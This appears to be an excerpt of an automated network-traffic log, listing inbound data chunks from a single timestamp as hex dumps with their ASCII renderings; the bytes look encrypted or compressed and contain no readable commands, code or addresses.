2022-11-29 23:31:36 UTC	32	IN	Data Raw: 2f bc 56 21 29 9c 3b 82 b1 59 8f 14 69 d8 08 98 9d 66 48 49 77 82 81 2c 16 34 72 4e a8 fd dd 73 a4 49 5a 4e 40 4a 7c 29 1d 5e df 54 7f f7 ff ef 4c ac 9b 4e e0 f5 90 27 9d 05 44 b9 e1 26 75 d4 99 68 91 c0 40 6f ff 1b 28 0d b7 e9 99 b2 ff fc 07 83 59 37 ed 4d 3d 3d f0 8d 6c 1f 60 82 40 e7 e7 7e 69 2f 57 ea 4f a5 82 68 00 c0 ec 90 1f a1 c8 90 b5 77 11 ed bd 67 d7 88 82 a2 24 bc 20 f8 88 50 d4 cb 02 6e bb 15 60 32 78 a3 ab 53 15 c4 02 e6 d7 d0 46 5f b8 ad 43 b2 30 6f 68 07 fd fc b7 09 1e 7c 7d f4 f6 00 ad b4 16 d4 d6 1f 0f 4d 08 09 bf 4b bd d8 14 e4 9b 7e c1 9b e6 c2 54 f0 5e 0e 83 1a 9e 4d f8 84 c1 0d 88 6a 87 a7 99 1a 57 81 0d 91 68 04 28 40 5c aa eb ee 0d 77 9b ee 8b 56 d5 f3 fc 32 e3 24 3f e1 a8 6b d4 cb 91 7f b5 1b 0d 06 39 2d e4 2e e1 f3 72 ff 4e 3a 63 Data Ascii: /V!);YifHIw,4rNsIZN@J\|)^TLN'D&uh@o(Y7M==l`@~i/WOhwg$ Pn`2xSF_C0oh\|}MK~T^MjWh(@\wV2$?k9-.rN:c
2022-11-29 23:31:36 UTC	34	IN	Data Raw: 7c 3c 8d 50 63 e9 a1 fb de be 07 cf 38 e0 cd 22 c6 78 b9 8d c5 86 ab ee 1f f6 77 15 93 c0 44 56 8a ef 93 41 23 1a 0c 2b 34 74 03 ac ef 18 f5 21 43 40 58 c6 8d b2 3e d6 bd 97 8b e5 35 89 b4 8f 7d 1d 56 54 44 5d fc 71 94 f2 a5 fd 56 ee 02 14 c4 6e a2 71 ed d2 5e f9 64 31 8e fe d3 7a 5f 6d 60 d5 66 8b ad 2e dc 45 e0 f3 81 af Data Ascii: \|<Pc8"xwDVA#+4t!C@X>5}VTD]qVnq^d1z_m`f.E
2022-11-29 23:31:36 UTC	34	IN	Data Raw: 3b ef 7f 03 80 99 3b 57 5f a5 17 8e 8e 35 c6 f3 6c f1 ff 10 0d f6 93 33 f6 20 73 3b 07 c7 26 eb 77 4c f7 d6 f3 25 54 bb 17 af 31 c3 06 a0 70 e2 28 27 7c 72 27 be f8 e9 16 7f 14 a7 d9 67 3a 6e 6f 5a ea 00 7f 46 a4 c3 55 3c 24 e3 e0 56 96 f4 dd eb 9a ad 2d 73 4e 85 43 6f 62 99 53 74 36 e2 74 59 bd d4 b4 60 ee e7 0b 08 18 15 1c 92 e1 a4 8a fb 61 65 fb 64 e8 9d 1c 45 83 0b 4f b0 a6 79 e3 e1 17 0f 92 84 6a 99 d1 24 d6 64 1a 92 38 dd 13 99 a5 1f 33 39 22 a9 68 af a2 f5 9c 1e f4 a8 58 b1 e6 c0 90 65 e7 9e 27 75 b7 4a 06 2f b0 16 d7 30 a6 67 a9 f7 f3 df 1f b2 ec a2 03 24 a5 84 dd 15 2f 0e a1 19 53 f4 18 d6 a3 d4 a0 1a ef f4 28 a6 14 78 4a f7 fa 86 b5 8b 3b bd 56 87 79 41 16 7e b1 2f 65 97 77 6d 5e 1a c8 46 fd 72 2c 26 7d 47 43 fb ec b6 40 68 11 64 57 ec 03 24 ca Data Ascii: ;;W_5l3 s;&wL%T1p('\|r'g:noZFU<$V-sNCobSt6tY`aedEOyj$d839"hXe'uJ/0g$/S(xJ;VyA~/ewm^Fr,&}GC@hdW$
2022-11-29 23:31:36 UTC	35	IN	Data Raw: 22 e2 57 ed 7a 4f 0a 6d 82 67 11 c4 d4 45 0e a1 91 d7 58 fd 97 a8 ff e5 57 62 61 22 4b 9f 37 77 ef 7c ed ef 66 23 61 ab 6d c0 b1 af a4 08 e9 72 56 cb 09 33 57 3b 03 dd 9a 7c 47 21 cb 63 bc 2c ed bd 54 57 94 23 86 a8 44 b8 2b 51 92 9b ab cf 0f e7 6e 0e 31 21 07 1e b5 05 0e 5e cb 0d 37 0a e7 0a d8 08 5e d6 d5 7d b6 99 3f e9 d1 92 8b 11 2a ee b0 3d fe 1a dd 6b c4 4b dc 60 f0 b7 7e b5 70 b0 3c 99 cc c1 d1 6c 92 7d 0e d5 76 52 b6 f5 41 95 8e 76 73 e7 bd 6f c7 38 39 e9 1c 5a a2 69 bb 3b 19 6e 81 55 90 aa f5 79 38 42 46 1e ab 3c fb e2 4d d1 50 74 07 8d 7d ac 07 08 81 f7 d3 09 b3 40 ad 8a f4 8a 6d b1 0e 3b 1b 17 f6 a3 d3 3b 7a 26 ca 79 b7 06 b5 1c 09 b2 70 fc ef 82 01 cc a9 3f d9 0c 52 8d c7 1f 68 c6 e0 0c 00 24 d7 fa 2e 60 df 28 74 01 eb 21 d1 b8 dd 99 14 ae 23 Data Ascii: "WzOmgEXWba"K7w\|f#amrV3W;\|G!c,TW#D+Qn1!^7^}?*=kK`~p<l}vRAvso89Zi;nUy8BF<MPt}@m;;z&yp?Rh$.`(t!#
2022-11-29 23:31:36 UTC	36	IN	Data Raw: 8e 87 68 40 46 dc 28 2d 12 5f 92 5e 09 ea a1 a9 b6 9e 1a 75 1b a0 64 19 01 43 f9 27 9a 18 69 82 2c 63 ae e1 e2 19 01 ea 5f 0f d9 f0 39 a2 b5 18 eb 12 3a e5 32 65 84 d1 4f cb b6 75 5e e5 0b 91 1e 08 6a 22 49 b6 45 03 af ef 3b c9 85 36 b9 bb f2 d7 bc ac 60 33 ad 9b 9d ec 13 cf e3 25 1a e4 7f 9b de 7f 91 7b 75 ef f1 68 82 28 0b 5f 11 35 9b a4 49 0c 19 7d 56 e9 6d d6 41 63 2b 39 0f 17 66 09 50 c2 0c 64 de 10 ae 9d 05 44 09 1a 3b 45 0b b3 6c 69 44 93 06 74 fe 75 45 3a e9 71 5e b6 0b cd b6 10 d2 58 c8 76 8f d5 55 01 33 18 1b bf 13 79 52 c2 87 77 dc 85 e8 9e 47 76 4a e3 4f ce 4d 12 64 4a 01 df f5 bd 1c 5c 44 0b 97 6d 59 85 10 d2 42 27 bd 66 c0 1b 3e 60 51 cc e9 22 82 58 2b 6e 69 92 28 df 67 eb af 43 4e b2 10 3c 8d 16 56 37 d4 d8 e5 20 3f f6 02 ab bc f2 1c d6 c2 Data Ascii: h@F(-_^udC'i,c_9:2eOu^j"IE;6`3%{uh(_5I}VmAc+9fPdD;EliDtuE:q^XvU3yRwGvJOMdJ\DmYB'f>`Q"X+ni(gCN<V7 ?
2022-11-29 23:31:36 UTC	37	IN	Data Raw: 83 2c 22 bc fb ea 5c 40 fe 34 85 dd 23 ad ea ef 74 6a 89 e3 0c c8 e3 9d 38 7f e1 49 e9 4b ea 3f c4 ce 7a 55 80 be b1 b6 ee f4 73 c2 57 58 9f f0 09 d1 8e f3 45 b0 9c e9 1d a0 46 e4 4f f3 4e 9e 0e 58 42 7d 4f 35 eb 0a e1 63 38 e4 f6 1c be aa 18 83 4c e2 05 c2 07 66 7b 53 03 d7 60 94 77 2d b4 66 13 6e 52 d1 58 f3 af 20 2e 7b e1 31 e6 44 8b 75 ed 93 ef c0 dc a9 8e d1 bb 71 84 2f 45 b6 23 6c 35 2d 99 1b f1 72 20 f6 5c c2 7b 8a c8 82 0d 76 ec fb 26 3e ce a6 03 d6 ee 30 ca f0 11 f2 a9 f5 be f6 bd bd 40 d4 64 02 be da 21 7f 86 84 57 14 97 f9 2f ad a4 85 08 5d d5 c3 3c 9f 43 7f c8 84 24 52 fc 53 f1 17 5a 6d 2e fc 53 c8 89 bf 27 c4 fa 72 d7 a3 45 aa f6 d5 ab 81 db 1a a1 df 8c aa 25 cd cd ff 19 33 ec a4 dd 0d 3f 85 a4 63 cb fb 8b d7 8b fb ae 60 d1 bb 04 82 6d 1d 92 Data Ascii: ,"\@4#tj8IK?zUsWXEFONXB}O5c8Lf{S`w-fnRX .{1Duq/E#l5-r \{v&>0@d!W/]<C$RSZm.S'rE%3?c`m
2022-11-29 23:31:36 UTC	39	IN	Data Raw: 9d 05 c9 b7 55 f5 87 e0 9b 68 91 48 d4 c3 9c e0 b9 31 1d e9 ad ba f7 2f 57 b9 1d 75 ac 4d b6 a8 4f 0e ff 24 3f 9a c5 2c 2f 8f 8b 47 03 b9 8d c0 96 11 95 3f fa 51 4f 49 10 0e 4a e0 9e 7f 77 9d 0a 15 e3 fe 51 e3 9e 73 f3 17 1c 52 ba 55 14 d0 ff 39 b7 d6 f8 88 59 e2 d4 94 cb ad 1f 02 6c a7 06 a2 5a 07 87 10 a8 65 b2 b1 c6 f6 8e 92 fd d5 e6 7c 59 5f dd 3a 67 c3 98 0f dc 3e be d8 9e 97 d2 ce 9b d5 95 d8 f6 63 e3 21 a4 b4 30 98 b7 bd f8 e8 3d ef fa 15 c9 c7 82 e5 36 2f 97 56 b8 dd bb 59 dc 42 c7 02 87 b4 f1 5f 5e b9 53 af 89 2f b5 12 dc ee 4f 67 f2 0c 2d 2e bd f0 90 81 fc 15 12 f9 8b 5f 65 3e 9f 24 a3 12 c3 72 c9 ea f4 0d 76 35 eb 67 4d 23 91 81 f0 4b 0a ce fc f7 2b 12 10 1a ad 67 fd 08 36 3a 06 68 a9 57 59 9c 64 a4 95 c9 35 aa 20 02 47 f9 de 17 f0 21 06 fd 07 Data Ascii: UhH1/WuMO$?,/G?QOIJwQsRU9YlZe\|Y_:g>c!0=6/VYB_^S/Og-._e>$rv5gM#K+g6:hWYd5 G!
2022-11-29 23:31:36 UTC	40	IN	Data Raw: 16 45 72 75 c7 3f b4 76 f4 45 43 a8 bb ae b1 76 eb 41 a7 54 ff af 87 4d 26 02 b0 0b 36 50 5e 58 f1 c4 73 03 87 e4 00 14 a4 68 ee 0f f4 d1 79 1f 70 12 85 8a c6 f8 b9 7f 83 33 f9 93 8c 58 a6 fb 3d a5 3b 55 cd 31 9a 3a 5a 6c ac b0 7c d4 ab f0 ea c5 ac 1c 12 58 ff d4 f3 b0 30 68 b9 d8 41 00 fb 95 9f 43 8b 28 1f 16 5b ad a9 4b 42 f1 59 b8 bb 72 4c 61 c9 8e d2 06 f7 bd 82 4b 37 e0 47 1a 20 f9 42 a0 dd 42 38 c8 77 07 09 a4 18 b2 20 e2 a5 dd 21 2e 96 f0 03 be 31 9d ad 42 f2 5c d4 fe 57 fe 39 30 75 52 02 84 18 c5 65 c8 ed 24 83 0b a7 e9 ad c0 0b c2 2a 7b a7 d4 92 31 ac 1f 05 c8 e1 94 60 f0 2e 30 0d c9 95 6f 63 29 ab 5e ab b3 37 0a 8b fe d9 3c 0c a8 4a 2c e7 92 09 dc b9 33 9e 54 b9 9d 26 db a6 71 c1 10 3c f4 18 03 3a d9 4c 25 d1 a3 ad 74 ae 36 b6 93 9d 63 91 1c 08 Data Ascii: Eru?vECvATM&6P^Xshyp3X=;U1:Zl\|X0hAC([KBYrLaK7G BB8w !.1B\W90uRe$*{1`.0oc)^7<J,3T&q<:L%t6c
2022-11-29 23:31:36 UTC	41	IN	Data Raw: 00 af 3f c2 9e a8 c5 76 fe 21 fd 9e 9e 31 c8 59 c3 2e 2e 6d 65 ed 6d 7d 85 d3 8e 97 34 48 1e 00 a7 a9 5f af ae 88 53 3e 1b 2c 1e da 31 1a b1 6b c6 6d 65 87 d2 3e 69 15 78 39 32 d5 88 16 6e 7d bf b2 e2 5e e5 cc c5 33 25 33 52 b1 a9 12 26 56 47 83 61 7a 37 80 6e 11 e0 33 28 fc 1f e0 ad 93 97 94 be db 72 63 d0 14 dd 06 90 71 3f dc ee d8 f0 5c 36 01 66 92 45 c2 e1 b5 78 ca a3 41 7e ae 4f a0 b5 71 f0 06 1e 74 d8 f5 2f d4 26 d6 47 34 22 89 76 c0 c4 21 dc f4 35 65 36 07 89 87 38 d3 38 c4 e6 db 09 17 74 e6 62 7a 59 7c ce 59 e7 af 56 f1 b5 09 0d e0 c6 99 cc 7d 03 0b 3d 83 a6 73 1a 0b d6 c0 4c 05 23 40 9d 18 42 ec d7 7f b7 19 a1 ff a0 d8 b2 85 2c d8 21 fc 86 d8 3e 51 4c e0 e8 ff 52 e8 ef 6b e3 21 e0 51 59 33 82 bb 50 2f 96 ab f5 32 7c 46 a9 e7 6f 41 d6 67 28 30 8f Data Ascii: ?v!1Y..mem}4H_S>,1kme>ix92n}^3%3R&VGaz7n3(rcq?\6fExA~Oqt/&G4"v!5e688tbzY\|YV}=sL#@B,!>QLRk!QY3P/2\|FoAg(0
2022-11-29 23:31:36 UTC	42	IN	Data Raw: 84 3d aa e6 e3 df 97 ad 63 b1 e1 ff f0 77 24 46 92 c0 ba 19 bd 7d 3d f7 b0 3e a5 2c 81 04 b4 52 97 8d f1 b8 44 83 ad 52 40 49 71 e3 44 54 0b d5 f6 28 90 a4 ee 5d 2e f6 1f 00 5b e2 e2 d8 a2 97 6f 34 fe ab 4a 42 43 f9 e2 d6 a6 ac 85 12 40 e7 a7 20 d4 cb 2c b3 ca ae 68 06 e9 e0 b5 b0 9f e0 04 d1 88 5c 52 28 1f 3a e7 12 c2 67 b0 2b 8e 21 5e e5 0b 7b 9f 9b 95 8b 24 e2 96 03 af e9 2c 31 d7 fc 32 81 7f db 14 fe 10 36 6e 2a 0d e6 73 ae d1 80 99 e0 38 5b 12 5b 70 7e ef 97 ec 26 c4 b1 80 65 e3 57 d2 a4 1e 0d 26 7f c4 e9 e2 81 b4 b3 62 73 0f ff ac df 53 64 e1 cc b3 d5 04 cb fa 94 b1 d0 76 c1 56 12 7a 3e 23 a9 19 c5 30 22 6d de db 3c e3 46 89 1f 49 66 ff 2c 2f f7 fb f1 f9 81 50 f5 b7 f9 a5 20 5c 10 2f bf 33 bf 6b 3d b2 bb 86 5a c2 a7 4a 83 9b b5 e0 0a 7f 77 9d 0a b9 Data Ascii: =cw$F}=>,RDR@IqDT(].[o4JBC@ ,h\R(:g+!^{$,126n*s8[[p~&eW&bsSdvVz>#0"m<FIf,/P \/3k=ZJw
2022-11-29 23:31:36 UTC	43	IN	Data Raw: c0 59 a4 8e d1 66 6f 8b 5e 3b 9a 51 ac c0 85 f3 0d 64 27 f7 77 64 c2 d0 4d 31 28 7b 33 11 ce b3 17 09 f2 9e 97 48 03 67 9e 3f 0b 65 b0 ec 60 33 d5 60 ca 7b b8 55 af b5 fa 09 e2 a9 0f 51 85 a1 be 38 af 5b 76 86 53 68 4c c8 3e 00 4d d9 4d de 4d c9 14 29 2b 4f 42 ef 2d 21 f4 ba 6d dc 34 ec ed ab 83 08 84 da ca 46 b1 19 cd dc e0 83 45 dc a3 bb c5 14 3f 83 1c f6 aa e5 ad 3f 95 70 af 5d 05 b4 1c f5 92 74 27 68 fc fa bd cb 62 0e c0 82 b8 2b 49 5b 71 5a 80 0c 25 0b 2e 3c 10 e0 a3 36 43 df eb 70 a2 8a 45 84 6a 2f 2f 56 0d 55 dd 33 5f 0a b3 78 23 7c e9 0e 49 56 0c c1 4d 29 23 41 83 c9 d2 50 60 81 2d 54 7b e4 45 14 c5 1c c2 e1 4b a9 24 eb 17 d3 06 66 8c e4 6d 01 48 38 b5 da aa 10 51 d5 e4 ed 00 22 14 13 d1 86 30 e4 0a 85 8a c6 95 40 c9 71 9c 92 35 4b f1 b1 5a ba 90 Data Ascii: Yfo^;Qd'wdM1({3Hg?e`3`{UQ8[vShL>MMM)+OB-!m4FE??p]t'hb+I[qZ%.<6CpEj//VU3_x#\|IVM)#AP`-T{EK$fmH8Q"0@q5KZ
2022-11-29 23:31:36 UTC	45	IN	Data Raw: 4d 61 df 35 4e 2f de 4c 91 66 cf de 80 1b 5b e7 f1 c5 5f a9 b7 be 2d fd af 68 5e d6 21 b6 9d cb 93 b8 a7 d3 d9 93 f7 d2 fd 8a 43 19 b3 53 9b 89 ec 54 53 81 c5 f3 bb c5 13 0d fc 6c d5 a8 35 bd ea 6c 7d fe 75 86 25 e7 15 15 51 55 0f ca bd e7 6b c8 d2 0d 58 f9 51 d4 44 a4 87 69 48 fd b8 b8 0a b9 0e ed ad 94 93 c9 ec 3d cc 35 34 34 8d 0d ea eb c9 62 5c 49 8f cc 23 99 15 0e f4 6b d1 42 3f e2 dc d1 18 cf 48 29 2c 1c f1 47 ec ee ee de 20 f2 e8 29 82 ed 9d ea 17 84 16 9a ec 59 95 71 b6 e8 20 a6 d9 0e 9d 31 a0 17 a2 cd d7 a9 a8 84 46 28 6f 24 98 cf 12 33 92 d8 00 33 0b c8 a8 ce 5f ed 8c 4e f4 49 c6 ee cb e4 5a 67 95 ca 97 d9 68 0f 28 b0 ea 34 dc 42 05 fa fe 89 b3 2c b6 57 53 25 87 d0 c0 5f e4 1e ff c7 e5 4e c3 f9 38 66 bf a8 c3 1c 12 85 40 ce cd 72 a4 e1 82 a1 c0 Data Ascii: Ma5N/Lf[_-h^!CSTSl5l}u%QUkXQDiH=544b\I#kB?H),G )Yq 1F(o$33_NIZgh(4B,WS%_N8f@r
2022-11-29 23:31:36 UTC	46	IN	Data Raw: c2 c7 ae c3 ac fc d6 33 c7 1f af 02 23 0d fb ae d0 7a 55 50 18 26 72 ed 9f 94 c9 e4 3c 1d ab 3b e0 28 56 71 11 28 5f 06 a5 20 ab 24 43 40 62 e5 d8 f3 f9 a0 46 e4 be 7c 9e f2 ff c5 07 a8 ff 53 44 51 dd 35 5d b6 9f 87 f1 a8 0d be cd 91 c9 c2 f1 3d 0b 58 f1 c4 1d 55 0d 29 ab 28 8d 90 f9 89 1a fa be a8 82 fb 58 3b 39 ef 03 45 7d c3 bd d2 c4 f6 b1 fc b7 7e 3b 0c 54 87 36 82 f8 50 f9 72 1d 00 3d 23 cd c2 26 eb 8a f8 37 2b cb 5f 46 ca 75 ee 75 2c f9 1e 9f 31 11 df 70 28 ac 31 91 4a d4 9c cd d6 bb 72 c8 8e d0 d7 90 75 02 41 a4 5a 90 28 c2 52 d8 2c ac 58 74 55 13 16 80 b4 43 66 6e 1a 20 68 24 c3 d9 14 c7 8a 70 2c e0 34 c8 0c 2d ef ec 50 01 d7 3e a5 fc 4c 1c 8c 99 44 f1 d8 d3 44 f5 bc 11 78 37 bd 7b ea 43 7b d1 41 3f 85 e8 5e b5 6f 40 e0 0c e5 1d 2a 9d 24 37 97 9c Data Ascii: 3#zUP&r<;(Vq(_ $C@bF\|SDQ5]=XU)(X;9E}~;T6Pr=#&7+_Fuu,1p(1JruAZ(R,XtUCfn h$p,4-P>LDDx7{C{A?^o@*$7
2022-11-29 23:31:36 UTC	47	IN	Data Raw: a7 50 1b d1 94 6d 68 97 80 bc e1 83 9a a0 90 68 56 91 2d 68 9e 10 05 8b 92 5b 1d b6 b4 2d 8a 01 0f 9f b7 a0 9f 1f f2 1b e0 6e 23 a5 b5 61 5d 21 ae 7c f4 8e cd 95 b4 30 9b 3b 38 34 6a 4c 26 f6 9e 31 31 26 bc d8 17 ed 5f 15 ca 8d 4a dc e9 68 b0 f6 b9 8e 56 d5 f9 29 1a f4 17 45 46 d9 64 a0 4b 52 3a 69 e9 38 fa 82 d2 98 62 a5 fb b5 8c 6b 1b 99 9b d5 5f 3d 22 a1 dd 10 28 8c 22 4f df e9 94 91 b6 2c 7a 75 c7 0c b1 c5 e5 ef 22 c3 1d 51 1f 4a a1 f9 f1 6e 78 a1 77 61 a4 33 6e ba cc 84 b1 59 72 db b1 5c 40 1b 6e b4 83 b8 ec b3 78 00 46 88 27 e6 60 c2 77 74 f0 93 93 5e 99 ea 17 64 ca 95 f1 cb 43 2e 10 73 fc 2f 1d f2 49 5e 8b f2 a9 bf f8 06 58 3e 8b db 7f 3e 19 71 d1 f8 86 6e c4 37 91 20 ff 8e a9 cf f5 a2 63 27 45 5a 13 72 3f f9 cd d0 bc 71 e9 7d 34 8a 0c ff c6 1d 42 Data Ascii: PmhhV-h[-n#a]!\|0;84jL&11&_JhV)EFdKR:i8bk_="("O,zu"QJnxwa3nYr\@nxF'`wt^dC.s/I^X>>qn7 c'EZr?q}4B
2022-11-29 23:31:36 UTC	48	IN	Data Raw: 36 b2 07 f0 25 cd f5 c2 9c 81 fb 7c 2e a4 4b 96 6f c3 5e d8 b3 27 b7 ef e6 4e 0a 74 c1 4e 56 15 ef ab 0f 7d cd 7f 8d 94 66 4f 22 e3 56 d7 29 c7 8e ba 99 0d b8 78 1c 19 ae 54 5c e5 4c 4c 18 fc f0 03 5f d0 8a fd 8b e8 eb d7 2a 6e 2e c1 5a 75 c3 41 8c a2 3e 9a ab fc 32 39 33 74 64 0c c7 1c 5a 43 d1 e0 ce 52 9d d3 24 d6 12 7f 10 01 6a 68 3e a6 5e 68 b1 63 a9 c3 31 4d ae cb 4a a0 64 cc 18 2b 87 eb fa e4 92 7d 64 b1 0f da 16 ca 8d 95 77 0f a3 69 0b dc 72 9d 83 9d e0 4c 14 5a 7b 2e 77 27 df 91 18 53 4e a0 dc 40 ad f1 3c 52 0b bd 24 77 92 6c 9b 4c 32 c4 c9 24 13 a8 87 de 23 1e bb 4d 2f 65 4c a1 1c c8 9c 4d 91 58 e7 d9 82 53 5d 70 fc e4 8b ac 68 11 9b a4 c2 1f 89 46 ca a4 d3 29 5f c3 56 6e c8 92 67 b0 53 64 ad dc 99 19 c3 18 89 b8 c5 1a 4f e8 5a 21 ea ec db e9 6c Data Ascii: 6%\|.Ko^'NtNV}fO"V)xT\LL_*n.ZuA>293tdZCR$jh>^hc1MJd+}dwirLZ{.w'SN@<R$wlL2$#M/eLMXS]phF)_VngSdOZ!l
2022-11-29 23:31:36 UTC	50	IN	Data Raw: 83 12 ef a9 cf 05 6c 65 9d 5f 06 68 da 9f db 53 5c de e0 dc cc 03 ec 36 94 8d e6 cb 93 37 94 99 3b 00 05 a7 8e 02 cb 31 07 c8 da af 0f f4 49 8a 54 e0 e1 26 66 94 d9 7a a8 8b 08 34 a1 37 4a c3 81 5a cf 33 e1 fc 7d b6 bb b4 50 98 03 f1 60 08 b1 0e b6 4a 59 42 53 be 80 e6 af f0 8e e3 07 35 9f 19 94 32 d5 14 72 73 b7 1d ed c6 Data Ascii: le_hS\67;1IT&fz47JZ3}P`JYBS52rs
2022-11-29 23:31:36 UTC	50	IN	Data Raw: de e8 4b be d9 0b 36 d7 20 38 3b d1 84 11 62 c7 2c 37 af 6d 9c d2 4d de 40 b4 02 84 69 42 e1 ee 8b 55 3a 33 aa 0b e9 e0 c8 59 33 82 44 25 97 f5 cf d5 a9 7d e0 09 c5 10 8a 7f fd 6e 0e 26 bd 82 c2 f5 3e 23 d9 19 ab 49 59 0b 91 9f d7 6b 08 a3 79 fb bd 6d 3b 53 4b 5c f4 42 6b 96 78 9c 3e 48 d8 4d be d1 28 21 5c c9 31 40 94 1e 2c 0f 6e 92 41 57 98 22 48 d5 16 e0 89 9c 5a 18 e4 8a cb ee d5 5d 77 c0 da e9 54 be 43 da 7d f1 8a 3e d2 54 93 8b db a1 3b ac 32 a6 fd 56 7b 34 0d 08 a9 8c d2 c8 47 a8 ed 5e 73 ae 92 fd 45 92 52 12 be 4e fd 99 16 fc 78 bb 81 c3 87 4d d0 cc 7a f9 50 84 a8 53 87 3a 27 13 62 be ac 6d fd a5 85 d0 ea 72 fc 15 21 04 59 42 bf 91 03 fa 36 b2 83 f2 25 cd 32 c3 9c 59 fb 7c b2 a6 4b 96 1d 98 d7 ac b3 27 33 ed e6 4e 62 c9 c0 97 56 15 63 a9 0f 7d f1 Data Ascii: K6 8;b,7mM@iBU:3Y3D%}n&>#IYkym;SK\Bkx>HM(!\1@,nAW"HZ]wTC}>T;2V{4G^sERNxMzPS:'bmr!YB6%2Y\|K'3NbVc}
2022-11-29 23:31:36 UTC	51	IN	Data Raw: 35 54 2e 48 44 c5 20 3a ea 6c 1c 1e 2f 8f e2 ef fe e7 b8 aa 8c e7 66 47 fa 1b e1 ad 4f 34 20 24 3f ab 8c b6 61 0b ca cc 6b af 0e a5 3b ee 2f 69 45 95 19 a1 0b 15 b5 77 f2 dd 6c dc 5c cb 80 5b f2 1c 61 a9 f4 44 8e 14 81 c9 74 ff 89 6f dd d6 47 9e a5 d0 d4 03 8a 4b 9e 0d 65 ad 3a a3 5a 6f c6 8d 39 56 25 09 c5 6e 21 85 41 20 d9 0e 76 01 e6 0e 65 c5 d4 ff 56 7b 46 76 14 b7 6c 8a ce 95 3a 77 e1 ff 7b 7a 90 23 97 79 32 b1 fc 26 1b 6b 0c 61 9f 6e ba 06 6d 80 38 58 bf dd c1 b2 dc 42 24 1f 11 ac 74 24 a1 a5 ae da 81 81 3f ce 10 5b 0f 61 4d e1 d4 b4 cd 59 87 45 e7 88 ac 7a c2 c0 d8 79 63 64 7b a8 ef 11 61 4a c5 1b 26 35 31 dc 4d 23 72 e1 cb 53 8f b5 78 1a 7e ed ef b4 b9 a1 98 20 e5 f1 ae c7 16 d7 54 f8 64 33 68 40 72 fc 45 fd 46 04 21 4e f2 36 bb 55 38 14 6d c3 19 Data Ascii: 5T.HD :l/fGO4 $?ak;/iEwl\[aDtoGKe:Zo9V%n!A veV{Fvl:w{z#y2&kanm8XB$t$?[aMYEzycd{aJ&51M#rSx~ Td3h@rEF!N6U8m
2022-11-29 23:31:36 UTC	52	IN	Data Raw: 96 b5 c3 39 43 48 57 ab 31 a0 6a 2e a4 ff 88 3e a0 27 fa 4e 3b bf 8a a8 06 53 5a 2d 4f 84 19 50 0f d7 63 13 3c eb ec 41 d9 94 85 63 83 7c b7 0b 45 d0 84 db af 2e 1c 54 56 87 0b ff 55 2c 00 8f 6b 12 28 be 8c e2 01 5d 9f 3b fb c0 8e fd 98 72 73 f2 b4 e8 0e 25 7f c6 03 5c 34 49 5d 95 2d 44 32 ac 49 88 f2 ff 47 de d0 4c 3a c2 c7 61 b7 c7 c7 bf bf f3 82 b9 b3 6b 4c 5e 35 74 04 f0 96 98 e1 eb 9a fd 6c 00 cd e3 6b 9f 4f 64 08 e1 c9 34 01 0f fc 54 92 8e d5 24 2d 65 6b d5 c1 49 64 b2 d0 82 3b 3f 34 c1 0f 21 d3 8e 98 0c b8 34 18 99 97 12 bc 7b 6d ed 2f 80 2f 33 48 07 40 e0 06 69 c9 55 9a e1 c8 31 e8 4c 9e 35 9d 79 db e4 0e cd 13 49 53 17 06 7a 71 2c 82 d3 0c 1f 0a 54 b0 16 e2 70 a9 7f 2c fb 57 31 b7 eb 61 1f e0 8d a5 4d c6 33 27 4c 92 6c 74 52 ca 99 d3 65 f0 de ae Data Ascii: 9CHW1j.>'N;SZ-OPc<Ac\|E.TVU,k(];rs%\4I]-D2IGL:akL^5tlkOd4T$-ekId;?4!4{m//3H@iU1L5yISzq,Tp,W1aM3'LltRe
2022-11-29 23:31:36 UTC	53	IN	Data Raw: 1b 73 e6 27 c5 9d 06 4d 61 26 96 fb ca 52 53 ac 03 66 70 8a 47 e3 c9 2f 1d 72 87 74 f9 79 49 c5 ad 7e 2f a8 a6 28 9b 5f d9 27 2c c3 d1 eb 4e a6 5f 98 15 6e be 57 ce 2e 0f 5b 0c fa 50 3f 22 49 3b 19 b3 89 8b 13 ac 4b 95 1a 99 fc 12 8f 38 99 72 16 ed 10 d0 46 88 e2 e0 5d b3 89 97 fe 40 11 07 62 12 cc ca e1 77 37 89 8a ee 5a 3c 5c 36 e8 a2 e4 bb 48 6c a1 50 9f 30 07 6e f8 4f 97 6b 71 f0 35 40 4d 31 6e b0 1e b5 36 85 69 36 09 20 81 5b 55 66 51 e5 49 b5 e2 b6 0c 66 dc e3 04 34 7f 7d ab ac fe 43 f6 e6 17 d7 dc 9b 35 ff c2 e3 0f 95 0b f6 d8 9c d5 9e 32 10 d8 2c d5 bc 05 ce 37 85 5e 4e a1 51 63 fc 6e 2f 7b b8 7e e7 67 89 68 bb 2c 49 1e de eb 1b b2 98 f7 42 4b 1f f0 8b b0 b6 ee 4b a7 10 44 cf c0 16 05 25 36 89 08 50 cd e9 37 9c 85 63 22 84 ab 14 99 81 41 bb 1f 50 Data Ascii: s'Ma&RSfpG/rtyI~/(_',N_nW.[P?"I;K8rF]@bw7Z<\6HlP0nOkq5@M1n6i6 [UfQIf4}C52,7^NQcn/{~gh,IBKKD%6P7c"AP
2022-11-29 23:31:36 UTC	55	IN	Data Raw: a7 19 cf c7 e4 97 36 74 50 96 b2 45 a1 20 2a e4 e6 e3 8d fb 5d 98 30 25 62 4d 85 8a 99 0f 7c 4a 32 39 2c a9 5e b3 5e 6a 57 62 dc 32 67 b1 40 6a 3b 71 fd d8 79 0c e8 09 3e 30 e5 f1 e6 26 43 9b 9c a9 94 be f0 b3 c3 f2 12 3d c9 2b 74 7e e4 c7 de 62 9d ea b7 c6 ac 9d d0 96 af f4 c0 3e 3c 6d 21 07 96 ce 16 3c f2 73 7e c4 3a 38 37 ca 82 ce ce 6e e3 39 9a c8 7d 0f 75 d9 5a 94 80 af cf 4d d4 bd ca fc 9e ec 6d c6 2b d7 59 e7 98 af 10 4d ad a2 80 fc 72 4a eb 5f a9 88 63 07 82 15 6d dd 5b f4 19 3c c7 86 b2 d5 69 6e 47 63 75 6b 0f 17 6c 88 a0 c4 d7 ff 5a 71 59 5e 50 cf d6 66 ee 38 49 45 45 81 48 15 93 9c 4b f3 31 1d 08 65 ba 10 ea e2 f7 99 34 98 b4 ff fb 2a 7b 91 b1 c1 30 e5 84 21 0b 47 c7 bd d0 de e5 6a 9c ba ff 45 92 a7 c4 6c 9b b5 e2 9b 75 34 9d 5c c6 86 d2 24 4a Data Ascii: 6tPE ]0%bM\|J29,^^jWb2g@j;qy>0&C=+t~b><m!<s~:87n9}uZMm+YMrJ_cm[<inGcuklZqY^Pf8IEEHK1e4{0!GjElu4\$J
